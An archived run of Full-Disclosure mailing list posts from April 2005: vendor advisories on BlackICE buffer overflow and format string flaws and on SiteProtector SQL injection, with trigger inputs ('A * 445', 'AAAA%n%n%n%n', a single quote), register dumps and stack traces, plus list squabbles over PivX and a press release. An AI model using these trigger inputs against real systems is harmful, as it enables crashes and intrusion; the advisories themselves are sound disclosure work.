Hosted and sponsored by Secunia - http://secunia.com/
lor.tharholmhushmail.com
Date: Fri Apr 08 2005 - 13:59:43 CDT
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
>You and I couldn't possibly build what PivX has built in terms of
>professional corporate structure, public NASDAQ stock exchange
>listing, business relationships and loyal partners, qualified
>employees, paying customers, etc for anything less than PivX has
>spent to get where it is today, with its existing problems-and-
OTC BB:PIVX.OB YOU TO RED EYE BATTYBWOY
Singer Lewak Greenbaum & Goldstein LLP ("Singer") resigned
substantial doubt about the Company's ability to continue as a
going concern.
Robert N. Shively resigned as President, Treasurer, Chief Executive
Officer and Acting Chief Financial Officer
Geoff Shively resigned as Chief Scientist and a director of the
Company
>I will gladly testify at your criminal trial as to the technical
>and forensic issues that disprove your assertions of wrongdoing by
>PivX. I have an intimate understanding of these issues, and of
>this company.
SINSEMILLA SKIN YOUR TEETH WHOLE HEAP YA NUH SEE?
.:.
:|:
.:|:.
::|::
:. ::|:: .:
:|:. .::|::. .:|:
::|:. :::|::: .:|:;
`::|:. :::|::: .:|::'
::|::. :::|::: .::|:;
`::|::. :::|::: .::|::'
:::|::. :::|::: .::| ::;
`:::|::. :::|::: .::|::;'
`::. `:::|::. :::|::: .::|::;' .:;'
`:::.. ?::|::. :::|::: .::|::? ..::;'
`:::::. ':|::. :::|::: .::|:' ,::::;'
`:::::. ':|:::::|:::::|:' :::::;'
`:::::.:::::|::::|::::|::::.,:::;'
':::::::::|:::|:::|:::::::;:'
':::::::|::|::|:::::::''
`::::::::::;'
.:;'' ::: ``::.
:':':
CHA!
-----BEGIN PGP SIGNATURE-----
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.4
wkYEARECAAYFAkJW1J0ACgkQTrOyScgyfI6yigCaAq1VpeORHelde9Jv7Li4I794i50A
niFcjfTs1VCi8YTaw/s7f1wjxyrr
=M7BN
-----END PGP SIGNATURE-----
Concerned about your privacy? Follow this link to get
secure FREE email: http://www.hushmail.com/?l=2
Free, ultra-private instant messaging with Hush Messenger
http://www.hushmail.com/services-messenger?l=434
Promote security and make money with the Hushmail Affiliate Program:
http://www.hushmail.com/about-affiliate?l=427
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
From: Microsoft Security Response Center (securemicrosoft.com)
Date: Fri Apr 08 2005 - 14:21:05 CDT
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Hello!
The Microsoft Security Response Center investigates all reports of
security vulnerabilities sent to us that affect Microsoft products.
If you believe you have found a security vulnerability affecting a
Microsoft product, we would like to work with you to investigate it.
We are concerned that people might not know the best way to report
security vulnerabilities to Microsoft. You can contact the Microsoft
Security Response Center to report a vulnerability by emailing
securemicrosoft.com directly, or you can submit your report via our
web-based vulnerability reporting form located at:
https://www.microsoft.com/technet/security/bulletin/alertus.aspx.
Sincerely,
Microsoft Security Response Center
-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1
iQIVAwUBQlbY4oreEgaqVbxmAQK5yhAAkm+H1/V69L5iLILNuSUSsgnd4Tw5Lzwj
uyhigxfdJR9WYXSNg/7WCoMI77G6No8QvKOfkrXqbyv6SYcR5ZVDWYzeE3+jgje+
AfqWT9r0du8Wj7q+Qby/j61OaezQkGoX/WRM+KV/RAhSVgXybcUMmdyeBNY9TiBg
ixlCuE75VndS0vMwkf8rzGaW/YXzMveLEXKGyYhkkZEDZ+Q2NZeFwxsXUEfw8yCL
nUYm6D9KAz5ekhRNtv22eoTXfTrXOfdziEAGGB1J6hKowEgeTaKcRPuTadz4A8YB
gGzJPN3J6t1Au1IHRsgfnVou9INFtahHA5B1NbfKyHGLsoztYKqXxLo4u7Z/b2+a
Vj8yiZNmaFD1IPzPnb4LS4RBZSgPMcwaB6pbXt7Y9n/g8VmrkqouDEdprHlMltoS
JpqYpnTdZtsxaGg6wimaFv7CocdV4CKAuOpVdjvlezc6jUYLQ/H/LzgDFDekTXZv
TNJ7qzRl4GFKt2fK7+7m60x3VukWNy3JGQSxgOX7mkftfglrHzyOL6AtDwhf2ff4
uNVbWek9bTgpVvmmpxnFGu/h5hLp5/Hqe98lv2axlbEFLP1ZD00rNPPSLCxRY/xL
8DGokeQT2Oc1HysO2jo7kpFjW4mCTTh9qK1lh0ju7gGQa66SMJ9woT2V6sSsOwpS
LO3tKPf9GIQ=
=kT17
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
From: Francisco Amato (famatoinfobyte.com.ar)
Date: Fri Apr 08 2005 - 14:23:13 CDT
||
|| [ISR]
|| Infobyte Security Research
|| www.infobyte.com.ar
|| 04.08.2005
||
.:: SUMMARY
ISS - Internet Security Systems, RealSecure Desktop and BlackICE PC
Protection
Buffer Overflow
Version: BlackIce 7.0.322, It is suspected that all previous versions of
BlackIce
are vulnerable.
.:: BACKGROUND
BlackICE products provide Intrusion Detection, personal firewall, and
application protection.
http://www.iss.com
.:: DESCRIPTION
A local buffer overflow vulnerability affect RealSecure Desktop and BlackICE
PC Protection
This issue is due to a failure of the application to securely copy
user-supplied data
into field name of rules that user create.
Buffer used: A * 445
Information of Registers:
EAX 41414141
ECX 41414141
EDX 41414175
EBX 00000001
ESP 0012EC5C
EBP 0012EF00
ESI 0048A8E0 blackice.0048A8E0
EDI 00F29704
EIP 004055AF blackice.004055AF
C 0 ES 0023 32bit 0(FFFFFFFF)
P 1 CS 001B 32bit 0(FFFFFFFF)
A 0 SS 0023 32bit 0(FFFFFFFF)
Z 0 DS 0023 32bit 0(FFFFFFFF)
S 0 FS 0038 32bit 7FFDE000(FFF)
T 0 GS 0000 NULL
D 0
O 0 LastErr ERROR_ALREADY_EXISTS (000000B7)
EFL 00010206 (NO,NB,NE,A,NS,PE,GE,G)
ST0 empty -NAN FFFF FFD0D0C8 FFD0D0C8
ST1 empty -??? FFFF 00000000 00000000
ST2 empty -??? FFFF 00FE00CF 00CF00C7
ST3 empty -??? FFFF 00FE00CF 00CF00C7
ST4 empty -NAN FFFF FFD0D0C8 FFD0D0C8
ST5 empty -??? FFFF 00FF00D0 00D000C8
ST6 empty -??? FFFF 00000000 00000000
ST7 empty -??? FFFF 00800080 00800080
3 2 1 0 E S P U O Z D I
FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT)
FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1
.:: EXTRA
We did not find any way to gain additional privileges
.:: DISCLOSURE TIMELINE
03/22/2005 Initial vendor notification
03/25/2005 Initial vendor response
04/08/2005 Public disclosure
.:: CREDIT
Francisco Amato is credited with discovering this vulnerability.
famato][at][infobyte][dot][com][dot][ar
.:: LEGAL NOTICES
Copyright (c) 2005 by [ISR] Infobyte Security Research.
Permission to redistribute this alert electronically is granted as long as
it is not
edited in any way unless authorized by Infobyte Security Research Response.
Reprinting the whole or part of this alert in any medium other than
electronically
requires permission from infobyte com ar
Disclaimer
The information in the advisory is believed to be accurate at the time of
publishing
based on currently available information. Use of the information constitutes
acceptance
for use in an AS IS condition. There are no warranties with regard to this
information.
Neither the author nor the publisher accepts any liability for any direct,
indirect, or
consequential loss or damage arising from use of, or reliance on, this
information.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
From: Francisco Amato (famatoinfobyte.com.ar)
Date: Fri Apr 08 2005 - 14:24:46 CDT
||
|| [ISR]
|| Infobyte Security Research
|| www.infobyte.com.ar
|| 04.08.2005
||
.:: SUMMARY
ISS - Internet Security Systems, RealSecure Desktop and BlackICE PC Protection
Format String
Version: BlackIce 7.0.322, It is suspected that all previous versions of BlackIce
are vulnerable.
.:: BACKGROUND
BlackICE products provide Intrusion Detection, personal firewall, and application protection.
http://www.iss.com
.:: DESCRIPTION
A local format string vulnerability affect RealSecure Desktop and BlackICE PC Protection
This issue is due to a failure of the application to securely copy user-supplied data into
field name of rules that user create.
Buffer used: AAAA%n%n%n%n
Information of Registers:
EAX 41414141
ECX 00000004
EDX 00000200
EBX 0000006E
ESP 0012E578
EBP 0012E7D0
ESI 0012E82A ASCII "%n, "
EDI 00000800
EIP 7800FB05 MSVCRT.7800FB05
C 0 ES 0023 32bit 0(FFFFFFFF)
P 1 CS 001B 32bit 0(FFFFFFFF)
A 0 SS 0023 32bit 0(FFFFFFFF)
Z 1 DS 0023 32bit 0(FFFFFFFF)
S 0 FS 0038 32bit 7FFDE000(FFF)
T 0 GS 0000 NULL
D 0
O 0 LastErr ERROR_ALREADY_EXISTS (000000B7)
EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)
ST0 empty -NAN FFFF FFF8FCF8 FFF8FCF8
ST1 empty -??? FFFF 00000000 00000000
ST2 empty -??? FFFF 00FE00F7 00FB00F7
ST3 empty -??? FFFF 00FE00F7 00FB00F7
ST4 empty -NAN FFFF FFF8FCF8 FFF8FCF8
ST5 empty -??? FFFF 00FF00F8 00FC00F8
ST6 empty -??? FFFF 00000000 00000000
ST7 empty -??? FFFF 00800080 00800080
3 2 1 0 E S P U O Z D I
FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT)
FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1
.:: EXTRA
We did not find any way to gain additional privileges
.:: DISCLOSURE TIMELINE
03/22/2005 Initial vendor notification
03/25/2005 Initial vendor response
04/08/2005 Public disclosure
.:: CREDIT
Francisco Amato is credited with discovering this vulnerability.
famato][at][infobyte][dot][com][dot][ar
.:: LEGAL NOTICES
Copyright (c) 2005 by [ISR] Infobyte Security Research.
Permission to redistribute this alert electronically is granted as long as it is not
edited in any way unless authorized by Infobyte Security Research Response.
Reprinting the whole or part of this alert in any medium other than electronically
requires permission from infobyte com ar
Disclaimer
The information in the advisory is believed to be accurate at the time of publishing
based on currently available information. Use of the information constitutes acceptance
for use in an AS IS condition. There are no warranties with regard to this information.
Neither the author nor the publisher accepts any liability for any direct, indirect, or
consequential loss or damage arising from use of, or reliance on, this information.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
From: Francisco Amato (famatoinfobyte.com.ar)
Date: Fri Apr 08 2005 - 14:25:29 CDT
||
|| [ISR]
|| Infobyte Security Research
|| www.infobyte.com.ar
|| 04.08.2005
||
.:: SUMMARY
ISS - SiteProtector Console Sql-Injection
Version: 2.0.5.690, It is suspected that all previous versions of
SiteProtector Console
are vulnerable.
.:: BACKGROUND
SiteProtector is a security management system that provides a centralized
view and analysis of network,
server, and desktop protection agents and appliances.
http://www.iss.com
.:: DESCRIPTION
A Sql-injection vulnerability affect SiteProtector Console
This issue is due to a failure of the application to securely copy
user-supplied data into
fields "Tag Name" and "Object Name" of Incidents/Exception that user create
or modify.
Simple string use: "'"
Error that display when it make the injection:
######################BEGIN############################
A Database or SQL Error occurred while working with Site Rules.
net.iss.rssp.gui.site.analysis.exceptions.CommonSiteRuleException
at
net.iss.rssp.gui.site.analysis.AnalysisDataManager.throwCommonSiteRuleExcept
ion(AnalysisDataManager.java:442)
at
net.iss.rssp.gui.site.analysis.AnalysisDataManager.createSiteFilter(Analysis
DataManager.java:350)
at
net.iss.rssp.gui.site.analysis.command.AddEditSiteRuleCommand.execute(AddEdi
tSiteRuleCommand.java:48)
at
net.iss.command.CommandTemplate.templateExecute(CommandTemplate.java:179)
at net.iss.command.CommandHandler.executeCommand(CommandHandler.java:148)
at net.iss.command.CommandHandler.run(CommandHandler.java:116)
A database error occurred in the method "createNewSiteRule".
net.iss.rssp.entity.exceptions.SiteRuleException
at
net.iss.rssp.server.AnalysisManager.addExceptionFilter(AnalysisManager.java:
357)
at
net.iss.rssp.remote.impl.AnalysisBrokerImpl.addExceptionFilter(AnalysisBroke
rImpl.java:211)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source)
at java.lang.reflect.Method.invoke(Unknown Source)
at
net.iss.rssp.security.server.SecureAdaptorAction.run(SecureAdaptorAction.jav
a:22)
at
net.iss.rssp.security.server.SecureAdaptorImpl.invoke(SecureAdaptorImpl.java
:114)
at sun.reflect.GeneratedMethodAccessor21.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source)
at java.lang.reflect.Method.invoke(Unknown Source)
at sun.rmi.server.UnicastServerRef.dispatch(Unknown Source)
at sun.rmi.transport.Transport$1.run(Unknown Source)
at java.security.AccessController.doPrivileged(Native Method)
at sun.rmi.transport.Transport.serviceCall(Unknown Source)
at sun.rmi.transport.tcp.TCPTransport.handleMessages(Unknown Source)
at sun.rmi.transport.tcp.TCPTransport$ConnectionHandler.run(Unknown Source)
at java.lang.Thread.run(Unknown Source)
Database Error
SQL State = 42000
Vendor code = 105
Vendor msg = [42000][Microsoft][ODBC SQL Server Driver][SQL
Server]Unclosed quotation mark before the character
string '')
AND NOT EXISTS (SELECT 1
FROM ObservanceSiteFilters OSF WITH (NOLOCK)
WHERE OSF.ObservanceID = OB.ObservanceID
AND OSF.SiteFilterRuleID = 853)'.
net.iss.rssp.db.DataAccessException
at
net.iss.rssp.server.database.DatabaseObjectHandlerBase.handleSQLException(Da
tabaseObjectHandlerBase.java:75)
at
net.iss.rssp.server.database.SiteFilterHandler.write(SiteFilterHandler.java:
134)
at
net.iss.rssp.server.AnalysisManager.addExceptionFilter(AnalysisManager.java:
348)
at
net.iss.rssp.remote.impl.AnalysisBrokerImpl.addExceptionFilter(AnalysisBroke
rImpl.java:211)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source)
at java.lang.reflect.Method.invoke(Unknown Source)
at
net.iss.rssp.security.server.SecureAdaptorAction.run(SecureAdaptorAction.jav
a:22)
at
net.iss.rssp.security.server.SecureAdaptorImpl.invoke(SecureAdaptorImpl.java
:114)
at sun.reflect.GeneratedMethodAccessor21.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source)
at java.lang.reflect.Method.invoke(Unknown Source)
at sun.rmi.server.UnicastServerRef.dispatch(Unknown Source)
at sun.rmi.transport.Transport$1.run(Unknown Source)
at java.security.AccessController.doPrivileged(Native Method)
at sun.rmi.transport.Transport.serviceCall(Unknown Source)
at sun.rmi.transport.tcp.TCPTransport.handleMessages(Unknown Source)
at sun.rmi.transport.tcp.TCPTransport$ConnectionHandler.run(Unknown Source)
at java.lang.Thread.run(Unknown Source)
Error Inserting into table ObservanceSiteFilters Code: 52000 DB Key: 0
java.sql.SQLException: [42000][Microsoft][ODBC SQL Server Driver][SQL
Server]Unclosed quotation mark before the
character string '')
AND NOT EXISTS (SELECT 1
FROM ObservanceSiteFilters OSF WITH (NOLOCK)
WHERE OSF.ObservanceID = OB.ObservanceID
AND OSF.SiteFilterRuleID = 853)'.
at ids.sql.IDSSocket.error(IDSSocket.java:325)
at ids.sql.IDSSocket.verify(IDSSocket.java:270)
at ids.sql.IDSPrepared.execute(IDSPrepared.java:578)
at ids.sql.IDSPrepared.execute(IDSPrepared.java:559)
at
net.iss.rssp.server.database.SiteFilterHandler.write(SiteFilterHandler.java:
103)
at
net.iss.rssp.server.AnalysisManager.addExceptionFilter(AnalysisManager.java:
348)
at
net.iss.rssp.remote.impl.AnalysisBrokerImpl.addExceptionFilter(AnalysisBroke
rImpl.java:211)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source)
at java.lang.reflect.Method.invoke(Unknown Source)
at
net.iss.rssp.security.server.SecureAdaptorAction.run(SecureAdaptorAction.jav
a:22)
at
net.iss.rssp.security.server.SecureAdaptorImpl.invoke(SecureAdaptorImpl.java
:114)
at sun.reflect.GeneratedMethodAccessor21.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source)
at java.lang.reflect.Method.invoke(Unknown Source)
at sun.rmi.server.UnicastServerRef.dispatch(Unknown Source)
at sun.rmi.transport.Transport$1.run(Unknown Source)
at java.security.AccessController.doPrivileged(Native Method)
at sun.rmi.transport.Transport.serviceCall(Unknown Source)
at sun.rmi.transport.tcp.TCPTransport.handleMessages(Unknown Source)
at sun.rmi.transport.tcp.TCPTransport$ConnectionHandler.run(Unknown Source)
at java.lang.Thread.run(Unknown Source)
java.sql.SQLException: [42000][Microsoft][ODBC SQL Server Driver][SQL
Server]Unclosed quotation mark before the
character string '')
AND NOT EXISTS (SELECT 1
FROM ObservanceSiteFilters OSF WITH (NOLOCK)
WHERE OSF.ObservanceID = OB.ObservanceID
AND OSF.SiteFilterRuleID = 853)'.
at ids.sql.IDSSocket.error(IDSSocket.java:325)
at ids.sql.IDSSocket.verify(IDSSocket.java:270)
at ids.sql.IDSPrepared.execute(IDSPrepared.java:578)
at ids.sql.IDSPrepared.execute(IDSPrepared.java:559)
at
net.iss.rssp.server.database.SiteFilterHandler.write(SiteFilterHandler.java:
103)
at
net.iss.rssp.server.AnalysisManager.addExceptionFilter(AnalysisManager.java:
348)
at
net.iss.rssp.remote.impl.AnalysisBrokerImpl.addExceptionFilter(AnalysisBroke
rImpl.java:211)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source)
at java.lang.reflect.Method.invoke(Unknown Source)
at
net.iss.rssp.security.server.SecureAdaptorAction.run(SecureAdaptorAction.jav
a:22)
at
net.iss.rssp.security.server.SecureAdaptorImpl.invoke(SecureAdaptorImpl.java
:114)
at sun.reflect.GeneratedMethodAccessor21.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source)
at java.lang.reflect.Method.invoke(Unknown Source)
at sun.rmi.server.UnicastServerRef.dispatch(Unknown Source)
at sun.rmi.transport.Transport$1.run(Unknown Source)
at java.security.AccessController.doPrivileged(Native Method)
at sun.rmi.transport.Transport.serviceCall(Unknown Source)
at sun.rmi.transport.tcp.TCPTransport.handleMessages(Unknown Source)
at sun.rmi.transport.tcp.TCPTransport$ConnectionHandler.run(Unknown Source)
at java.lang.Thread.run(Unknown Source)
java.sql.SQLException: [42000][Microsoft][ODBC SQL Server Driver][SQL
Server]Line 10: Incorrect syntax near '')
AND NOT EXISTS (SELECT 1
FROM ObservanceSiteFilters OSF WITH (NOLOCK)
WHERE OSF.ObservanceID = OB.ObservanceID
AND O'.
at ids.sql.IDSSocket.error(IDSSocket.java:325)
at ids.sql.IDSSocket.verify(IDSSocket.java:270)
at ids.sql.IDSPrepared.execute(IDSPrepared.java:578)
at ids.sql.IDSPrepared.execute(IDSPrepared.java:559)
at
net.iss.rssp.server.database.SiteFilterHandler.write(SiteFilterHandler.java:
103)
at
net.iss.rssp.server.AnalysisManager.addExceptionFilter(AnalysisManager.java:
348)
at
net.iss.rssp.remote.impl.AnalysisBrokerImpl.addExceptionFilter(AnalysisBroke
rImpl.java:211)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source)
at java.lang.reflect.Method.invoke(Unknown Source)
at
net.iss.rssp.security.server.SecureAdaptorAction.run(SecureAdaptorAction.jav
a:22)
at
net.iss.rssp.security.server.SecureAdaptorImpl.invoke(SecureAdaptorImpl.java
:114)
at sun.reflect.GeneratedMethodAccessor21.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source)
at java.lang.reflect.Method.invoke(Unknown Source)
at sun.rmi.server.UnicastServerRef.dispatch(Unknown Source)
at sun.rmi.transport.Transport$1.run(Unknown Source)
at java.security.AccessController.doPrivileged(Native Method)
at sun.rmi.transport.Transport.serviceCall(Unknown Source)
at sun.rmi.transport.tcp.TCPTransport.handleMessages(Unknown Source)
at sun.rmi.transport.tcp.TCPTransport$ConnectionHandler.run(Unknown Source)
at java.lang.Thread.run(Unknown Source)
#######################END#############################
.:: EXTRA
We did not find any way to perform any unautorized actions or gain
additional privileges
.:: DISCLOSURE TIMELINE
04/01/2005 Initial vendor notification
04/06/2005 Initial vendor response
04/08/2005 Public disclosure
.:: CREDIT
Francisco Amato is credited with discovering this vulnerability.
famato][at][infobyte][dot][com][dot][ar
.:: LEGAL NOTICES
Copyright (c) 2005 by [ISR] Infobyte Security Research.
Permission to redistribute this alert electronically is granted as long as
it is not
edited in any way unless authorized by Infobyte Security Research Response.
Reprinting the whole or part of this alert in any medium other than
electronically
requires permission from infobyte com ar
Disclaimer
The information in the advisory is believed to be accurate at the time of
publishing
based on currently available information. Use of the information constitutes
acceptance
for use in an AS IS condition. There are no warranties with regard to this
information.
Neither the author nor the publisher accepts any liability for any direct,
indirect, or
consequential loss or damage arising from use of, or reliance on, this
information.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
From: Jason Coombs (jasoncscience.org)
Date: Fri Apr 08 2005 - 14:54:10 CDT
> The content inside is still fully usable
> and valid but a violation cannot be
> confirmed without yourself violating
> the law.
First of all, what law do you believe is violated by 'downloading' an unauthorized MP3 duplication of a recording?
Fair use doctrine covers this situation in a number of ways. For example, you do not violate copyright by downloading a file in order to find out what it is and where it came from, any more than you violate copyright by tuning into a radio broadcast. Somebody ELSE violates copyright if they broadcast a copyright-protected work, or distribute copies for download. You, as downloader, are fully within the fair use doctrine if you just receive, contemplate, and destroy upon recognizing that the work was not distributed by an authorized distributor/broadcaster.
How do you know what is and isn't authorized? Are you required to judge a book by its cover, even though the cover is nothing more than a filename in these cases? You are fully within the fair use doctrine if you download for the sole purpose of causing your computer to examine metadata that may allow you to determine the content, or if you contemplate the content with your senses by playback or access -- when and if you are satisfied that you have received a work that perhaps has not been duly licensed, you are in fact free to locate the copyright holder and negotiate a license.
Furthermore, in the get-a-clue department once again, the people who are doing the downloading to assist copyright holders with enforcement actions or investigations HAVE WRITTEN PERMISSION and therefore cannot be accused of violating the law by doing the download.
Why do people insist on spreading FUD when these are simple matters of intellectual property law and contract law that any person above the mental age of 14 has no trouble understanding when the facts are presented clearly?
Cheers,
Jason Coombs
jasoncscience.org
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
From: Georgi Guninski (guninskiguninski.com)
Date: Fri Apr 08 2005 - 15:17:08 CDT
On Fri, Apr 08, 2005 at 12:21:05PM -0700, Microsoft Security Response Center wrote:
> If you believe you have found a security vulnerability affecting a
> Microsoft product, we would like to work with you to investigate it.
>
hahahahahaha
m$ doing social engineering on fd, this is a joke.
basically they want your 0days so billg becomes more rich.
--
where do you want bill gates to go today?
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
From: Jason Coombs (jasoncscience.org)
Date: Fri Apr 08 2005 - 15:20:39 CDT
I'm glad you wrote again, 'Lor'.
You missed the press release? Or maybe you fail to comprehend good news when you see it.
I'll send a copy of the press release. Please let us all know what you think.
Sincerely,
Jason Coombs
jasoncscience.org
-----Original Message-----
From: <lor.tharholmhushmail.com>
Date: Fri, 8 Apr 2005 11:59:43
To:full-disclosurelists.grok.org.uk
Subject: Re: [Full-disclosure] I need uh Qwik-Fix please sho 'nuff!
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
>You and I couldn't possibly build what PivX has built in terms of
>professional corporate structure, public NASDAQ stock exchange
>listing, business relationships and loyal partners, qualified
>employees, paying customers, etc for anything less than PivX has
>spent to get where it is today, with its existing problems-and-
OTC BB:PIVX.OB YOU TO RED EYE BATTYBWOY
Singer Lewak Greenbaum & Goldstein LLP ("Singer") resigned
substantial doubt about the Company's ability to continue as a
going concern.
Robert N. Shively resigned as President, Treasurer, Chief Executive
Officer and Acting Chief Financial Officer
Geoff Shively resigned as Chief Scientist and a director of the
Company
>I will gladly testify at your criminal trial as to the technical
>and forensic issues that disprove your assertions of wrongdoing by
>PivX. I have an intimate understanding of these issues, and of
>this company.
SINSEMILLA SKIN YOUR TEETH WHOLE HEAP YA NUH SEE?
.:.
:|:
.:|:.
::|::
:. ::|:: .:
:|:. .::|::. .:|:
::|:. :::|::: .:|:;
`::|:. :::|::: .:|::'
::|::. :::|::: .::|:;
`::|::. :::|::: .::|::'
:::|::. :::|::: .::| ::;
`:::|::. :::|::: .::|::;'
`::. `:::|::. :::|::: .::|::;' .:;'
`:::.. ?::|::. :::|::: .::|::? ..::;'
`:::::. ':|::. :::|::: .::|:' ,::::;'
`:::::. ':|:::::|:::::|:' :::::;'
`:::::.:::::|::::|::::|::::.,:::;'
':::::::::|:::|:::|:::::::;:'
':::::::|::|::|:::::::''
`::::::::::;'
.:;'' ::: ``::.
:':':
CHA!
-----BEGIN PGP SIGNATURE-----
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.4
wkYEARECAAYFAkJW1J0ACgkQTrOyScgyfI6yigCaAq1VpeORHelde9Jv7Li4I794i50A
niFcjfTs1VCi8YTaw/s7f1wjxyrr
=M7BN
-----END PGP SIGNATURE-----
Concerned about your privacy? Follow this link to get
secure FREE email: http://www.hushmail.com/?l=2
Free, ultra-private instant messaging with Hush Messenger
http://www.hushmail.com/services-messenger?l=434
Promote security and make money with the Hushmail Affiliate Program:
http://www.hushmail.com/about-affiliate?l=427
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
From: Jason Coombs (jasoncscience.org)
Date: Fri Apr 08 2005 - 15:22:06 CDT
Lotus Fund Acquires Controlling Interest in PIVX Solutions From
Co-Founders; Seeks to Leverage Company's Unique Windows Security Technology
NEWPORT BEACH, Calif.--(BUSINESS WIRE)--April 7, 2005--PIVX Solutions,
Inc. (OTCBB:PIVX), the leader in next generation Windows Host-Based
Intrusion Prevention software, announces today that the private equity
firm Lotus Fund has increased their holdings in PIVX to become the
controlling shareholder of the company.
"We are very excited about the IT security industry, and we view host
intrusion prevention as the next significant area of growth within that
industry," said Tydus Richards, director at Lotus Fund and the new
Chairman of the Board at PIVX. "We evaluated many different companies in
this space and are impressed with the technology, the team and the
momentum at PIVX. Given the continually growing threats to PC users,
PIVX's products provide the protection that Windows users must have to
be truly protected against hackers and the malware they deploy. The
co-founders of PIVX have a legacy to be proud of and now we are
assembling the team to take the Company to the next level."
The company's primary software product, Qwik-Fix Pro, is designed to
proactively block known and unknown software threats in all versions of
Microsoft Windows and Internet Explorer. Using Active System Hardening
technology, Qwik-Fix Pro combines automatic remediation of critical
software security flaws with targeted configuration management. This
host-based technology is driven by world-class security research and
mitigates critical software vulnerabilities well before Microsoft
releases a patch or an anti-virus signature is written.
"Defective software represents the greatest security risk facing
organizations today. With tens of millions of lines of code in Microsoft
Windows, the potential for abuse is extremely high and will continue to
plague industries that rely upon this platform," said PIVX CTO, Alex
Tosheff. "Windows users must take a different approach to mitigating
this risk and by using a product like Qwik-Fix Pro as a key component in
a layered-security approach, they can achieve the best possible
protection against the greatest number of threats. In many cases, we are
providing the 'patch before the patch.'"
"We are very pleased that we are having success on multiple fronts,"
said Luis Curet, Interim CEO and senior vice president of sales and
marketing at PIVX. "We are seeing increased traction within our OEM,
International, Enterprise, Consumer and Forensic Services groups. It is
clear that companies understand the unique value proposition that we
provide. In addition, we're seeing a huge number of downloads of
Pre>View, our recently launched security scorecard application for
Windows computers."
PIVX will hold an investor conference call at 4:15 p.m. Eastern Standard
Time on Thursday, April 14, 2005. PIVX Solution's Chairman of the Board
Tydus Richards and PIVX's Interim CEO Luis Curet will host the call.
To hear the conference call as it takes place:
-- Call 1-800-434-1335 in the United States or Canada or;
-- Call 1-404-920-6620 in the Atlanta Area or Internationally
-- Pin Code: 646636
-- Exclusive: For Expedited Entry into the Conference: Please
register via this link for your Direct Access 800 number.
www.AccuConference.com/PIVX
To hear a recording of the call (available immediately following the
call by telephone for 30 days after the call takes place):
-- Call 1-800-977-8002 in the United States or Canada or;
-- Call 1-404-920-6650 in the Atlanta Area or Internationally
-- Pin Code: Press * then 646636
About PIVX
PIVX Solutions, Inc. (OTCBB:PIVX) is a security research product and
services company that leverages its domain knowledge to increase the
security of corporate PCs and servers and the Internet infrastructure.
PIVX also conducts highly confidential security-related work on behalf
of some of the world's largest corporations. PIVX research has
identified multiple vulnerabilities and ways to exploit many of the
worlds widely used Operating Systems and software including Microsoft
Windows, Microsoft IIS, Unreal Engine, Microsoft Internet Explorer,
Cisco IOS and Turbo Tax.
For more information, please visit www.pivx.com or call 949-999-1600.
Forward-Looking Statements
The statements contained in this press release that are not historical
are "forward-looking statements" within the meaning of Section 27A of
the Securities Act of 1933, as amended (the "Securities Act"), and
Section 21E of the Securities Exchange Act of 1934, as amended (the
"Exchange Act"), including statements, without limitation, regarding our
expectations, beliefs, intentions or strategies regarding the future.
PIVX intends that such forward-looking statements be subject to the
